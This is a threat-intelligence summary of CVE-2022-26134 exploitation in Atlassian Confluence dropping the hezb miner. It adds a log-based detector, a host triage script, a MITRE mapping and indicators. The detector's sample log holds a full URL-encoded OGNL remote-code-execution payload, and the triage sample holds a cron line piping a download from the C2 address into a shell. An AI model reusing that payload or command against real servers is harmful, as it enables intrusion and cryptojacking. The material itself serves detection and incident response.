Trend Micro’s analysis shows active exploitation of CVE-2022-26134 in Atlassian Confluence servers for cryptocurrency mining and other malware. The attacker uses an OGNL payload to trigger remote code execution, downloads ro.sh and ap.sh scripts, and ultimately drops the hezb miner while attempting lateral movement and firewall modifications. #CVE-2022-26134 #AtlassianConfluence #hezb #Kinsing #DarkIoT #Mirai #ChinaChopper
Keypoints
- The vulnerability CVE-2022-26134 is an unauthenticated remote code execution in Atlassian Confluence with a critical rating, and exploitation is observed in the wild for malicious cryptocurrency mining.
- Attackers deliver an OGNL expression via a crafted HTTP request to trigger RCE and verify exploitation by issuing an id command, with the response exposed in the X-Cmd-Response header.
- Infection chains show the use of shell scripts (ro.sh and ap.sh) downloaded from the C2 and a downloader binary (ko) to establish persistence and execute malware.
- The attacker infrastructure includes a C2 server at 106.252.252.226:4545 from which the scripts and payloads are fetched; the blocking and telemetry described in the analysis come from Trend Micro's own web reputation and antimalware layers, not from the malware.
- The observed malware family is hezb, with references to Kinsing and Dark.IoT; the analysis also notes that other malware, such as the Mirai botnet and the China Chopper web shell, has been observed in related Confluence campaigns (these are not miners).
- The activities cover discovery (SSH users, keys, and hosts), lateral movement via SSH, privilege escalation (PwnKit), and attempts to disable defenses (disabling iptables, setting the policy to ACCEPT, and flushing the rules).
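The exploitation pattern summarized above (an OGNL expression carried in the request URI, with the command output written into an X-Cmd-Response header) leaves a clear trace in web-server access logs. The following detector is an added example, not code from the Trend Micro analysis: it URL-decodes each request URI, rates a path that begins with `${` as a high-confidence CVE-2022-26134 attempt, and extracts the command passed to `Runtime.exec`. The log lines, IP addresses and the payload are constructed for the example (the payload follows the structure of the public proof of concept); tune the marker list to your own environment.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). They are NOT from the
# Trend Micro article; the OGNL payload is modelled on the public PoC structure.
SAMPLE_LOG = """\
203.0.113.10 - - [03/Jun/2022:10:01:02 +0000] "GET /login.action HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [03/Jun/2022:10:01:05 +0000] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 302 0 "-" "curl/7.79.1"
198.51.100.7 - - [03/Jun/2022:10:02:11 +0000] "GET /pages/viewpage.action?pageId=%24%7Bprice%7D HTTP/1.1" 200 7300 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Tokens that betray an OGNL expression making Java calls, as opposed to a
# stray "${" that happens to appear in a query parameter.
OGNL_MARKERS = (
    r'@[\w.]+@\w+',           # @fully.qualified.Class@staticMember
    r'getRuntime\(\)',        # Runtime access
    r'\.exec\(',              # process execution
    r'ServletActionContext',  # used to reach the HTTP response object
    r'X-Cmd-Response',        # header the public payload writes command output into
)
CMD_RE = re.compile(r'exec\("([^"]*)"\)')


def decode_uri(uri, rounds=2):
    """URL-decode up to `rounds` times so double-encoded payloads are caught."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def classify(uri):
    """Return (severity, decoded_uri, markers); severity is 'high', 'low' or None."""
    decoded = decode_uri(uri)
    path = decoded.split('?', 1)[0]
    # CVE-2022-26134 places the OGNL expression in the URI path itself, so a
    # path beginning with "${" is the strongest signal.
    if path.startswith('/${') or path.startswith('${'):
        markers = [m for m in OGNL_MARKERS if re.search(m, decoded)]
        return 'high', decoded, markers
    if '${' in decoded:
        return 'low', decoded, []
    return None, decoded, []


def extract_command(decoded_uri):
    """Pull the OS command out of a Runtime.exec("...") call, if present."""
    m = CMD_RE.search(decoded_uri)
    return m.group(1) if m else None


def scan(log_text):
    """Scan access-log text and return one alert dict per suspicious request."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        severity, decoded, markers = classify(m['uri'])
        if severity is None:
            continue
        alerts.append({
            'ip': m['ip'],
            'timestamp': m['ts'],
            'method': m['method'],
            'status': int(m['status']),
            'severity': severity,
            'markers': markers,
            'command': extract_command(decoded),
            'decoded_uri': decoded,
        })
    return alerts


if __name__ == '__main__':
    for alert in scan(SAMPLE_LOG):
        print(f"[{alert['severity']}] {alert['ip']} {alert['method']} "
              f"status={alert['status']} cmd={alert['command']} markers={alert['markers']}")
```

Run it against a real Confluence (or reverse-proxy) access log by passing the file contents to `scan()`. The `low` tier exists because `${` in a query string is not by itself an exploit; the decisive feature of this CVE is the expression sitting in the path segment, and the markers then tell you what the attacker executed.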
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The article describes active exploitation of CVE-2022-26134 in Confluence. Quote: “We observed the active exploitation of CVE-2022-26134, an unauthenticated remote code execution (RCE) vulnerability with a critical rating of 9.8 in the collaboration tool Atlassian Confluence.”
- [T1059.004] Command and Scripting Interpreter: Unix Shell – The injected OGNL expression downloads and runs the ro.sh shell script on the victim host; the quoted behaviour is shell-script execution, not PATH interception. Quote: “…injected an OGNL expression to download and run the ro.sh script in the victim’s machine.”
- [T1222.002] File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification – The malware is capable of changing the attribute of /etc/ld.so.preload to make it mutable. Quote: “the script capable of changing the attribute of /etc/ld.so.preload to make it mutable.”
- [T1564.001] Hide Artifacts: Hidden Files and Directories – Listed in the article’s technique mapping; the specific hidden paths are not quoted here. Quote: “Hide Artifacts: Hidden Files and Directories.”
- [T1518] Software Discovery – Listed in the article’s technique mapping; the software being enumerated is not quoted here. Quote: “Software Discovery” (as part of the listed techniques).
- [T1562.004] Impair Defenses: Disable or Modify System Firewall – It disables iptables or changes firewall policy to ACCEPT and flushes firewall rules. Quote: “Like many other cryptocurrency-mining malware, it disables the iptables or changes the firewall policy action to ACCEPT and flushes all the firewall rules.”
- [T1070.004] Indicator Removal on Host: File Deletion – Listed in the article’s technique mapping as part of the malware’s clean-up behaviour; the deleted files are not quoted here. Quote: “Indicator Removal on Host: File Deletion.”
- [T1053.003] Scheduled Task/Job: Cron – Listed in the article’s technique mapping as the persistence mechanism. Quote: “Cron.”
- [T1496] Resource Hijacking – The core objective is cryptocurrency mining. Quote: “for malicious cryptocurrency mining.”
- [T1082] System Information Discovery – The script inspects the host before acting: it checks whether hezb is already running and enumerates SSH material on disk. Quote: “The script checks for the presence of hezb in the running process… and scans for SSH users, keys, and hosts…”
- [T1018] Remote System Discovery – The malware discovers remote system attributes (SSH-related data) to enable movement. Quote: “Under the /root and /home directories, the script scans for secure shell protocol (SSH) users, keys, and hosts in the .ssh directory and .bash_history file.”
- [T1021.004] Remote Services: SSH – Lateral movement via SSH is used to run additional scripts on remote hosts. Quote: “During lateral movement via SSH, the malware also downloads the ldr.sh script on the remote hosts.”
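Several of the mapped techniques leave host-side residue that a responder can check for quickly: an entry in /etc/ld.so.preload (and an immutable flag toggled on it), a flushed iptables rule set with ACCEPT policies, a cron line pulling from the C2, and the hezb process itself. The triage script below is an added example, not Trend Micro's code: its checks accept the text output of the relevant commands so they can be tested offline, `collect()` gathers the same outputs from a live host, and `SAMPLE_SNAPSHOT` is constructed data showing what a compromised host might return (the preload library path and mining pool are placeholders). It uses only the IP and file names listed on this page as indicators.

```python
import re
import subprocess

# Indicators taken from the summary above; everything else here is an
# assumption or constructed sample data.
IOC_IP = "106.252.252.226"
IOC_SCRIPTS = ("ro.sh", "ap.sh", "ldr.sh")
IOC_PROCESS = "hezb"


def check_ld_preload(content, lsattr_line):
    """/etc/ld.so.preload is normally absent or empty; any entry, or an immutable flag on it, deserves a look."""
    findings = []
    entries = [l.strip() for l in content.splitlines() if l.strip() and not l.startswith('#')]
    if entries:
        findings.append(f"/etc/ld.so.preload loads {entries}")
    flags = lsattr_line.split()[0] if lsattr_line.strip() else ""
    if 'i' in flags:  # lsattr prints 'i' for the immutable attribute
        findings.append("/etc/ld.so.preload carries the immutable (i) attribute")
    return findings


def check_iptables(rules):
    """Input is `iptables -S` output. Flag the flushed-and-ACCEPT state the miner leaves behind."""
    policies = dict(re.findall(r'^-P (\S+) (\S+)', rules, re.M))
    rule_count = len(re.findall(r'^-A ', rules, re.M))
    if policies and all(p == 'ACCEPT' for p in policies.values()) and rule_count == 0:
        return ["all iptables chain policies are ACCEPT and the rule set is empty"]
    return []


def check_cron(crontab):
    """Flag cron lines that reference the C2, the dropper scripts, or pipe a download into a shell."""
    findings = []
    for line in crontab.splitlines():
        s = line.strip()
        if not s or s.startswith('#'):
            continue
        if (IOC_IP in s or any(f in s for f in IOC_SCRIPTS)
                or re.search(r'\b(curl|wget)\b.*\|\s*(ba)?sh\b', s)):
            findings.append(f"suspicious cron entry: {s}")
    return findings


def check_processes(ps_output):
    """Input is `ps aux` output (11 columns). Flag the hezb binary or anything talking to the C2."""
    findings = []
    for line in ps_output.splitlines()[1:]:  # skip the header row
        cols = line.split(None, 10)
        if len(cols) < 11:
            continue
        pid, cmd = cols[1], cols[10]
        exe = cmd.split()[0].rsplit('/', 1)[-1]
        if exe == IOC_PROCESS or IOC_IP in cmd:
            findings.append(f"suspicious process pid={pid}: {cmd}")
    return findings


def triage(snapshot):
    """Run every check over a dict of command outputs and return all findings."""
    return (check_ld_preload(snapshot.get('ld_preload', ''), snapshot.get('lsattr', ''))
            + check_iptables(snapshot.get('iptables', ''))
            + check_cron(snapshot.get('crontab', ''))
            + check_processes(snapshot.get('ps', '')))


def collect():
    """Gather the same outputs from the live host (run as root); a missing tool yields ''."""
    def run(cmd):
        try:
            return subprocess.run(cmd, capture_output=True, text=True, timeout=30).stdout
        except (OSError, subprocess.SubprocessError):
            return ''
    return {
        'ld_preload': run(['cat', '/etc/ld.so.preload']),
        'lsattr': run(['lsattr', '/etc/ld.so.preload']),
        'iptables': run(['iptables', '-S']),
        'crontab': run(['crontab', '-l']) + run(['cat', '/etc/crontab']),  # per-user spools not covered
        'ps': run(['ps', 'aux']),
    }


# Constructed snapshot of what a compromised host might return (placeholder paths/pool).
SAMPLE_SNAPSHOT = {
    'ld_preload': '/usr/local/lib/libsystem.so\n',
    'lsattr': '----i---------e------- /etc/ld.so.preload',
    'iptables': '-P INPUT ACCEPT\n-P FORWARD ACCEPT\n-P OUTPUT ACCEPT\n',
    'crontab': '*/2 * * * * curl -s http://106.252.252.226:4545/ro.sh | sh\n',
    'ps': ('USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n'
           'root 1 0.0 0.1 1 1 ? Ss 10:00 0:00 /sbin/init\n'
           'root 4242 99.0 2.0 1 1 ? Sl 10:05 5:00 /tmp/hezb -o pool.example:3333\n'),
}

if __name__ == '__main__':
    for finding in triage(SAMPLE_SNAPSHOT):
        print('[!]', finding)
```

On a suspect host, replace `SAMPLE_SNAPSHOT` with `collect()` and run as root. The checks are deliberately conservative: an all-ACCEPT policy is only reported when the rule set is also empty, because many hosts legitimately run with ACCEPT defaults, and the cron check keys on the page's C2 and script names plus the generic download-pipe-to-shell pattern rather than on cron entries in general.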
Indicators of Compromise
- [IP] 106.252.252.226:4545 – C2 server used by the malware to fetch scripts and communicate payloads.
- [File] ro.sh, ap.sh – Shell scripts downloaded and executed as part of the infection chain.
- [File] ldr.sh – Script downloaded during lateral movement to carry out further actions.
- [File] ko – Downloader binary fetched from the C2 as part of the hezb delivery chain.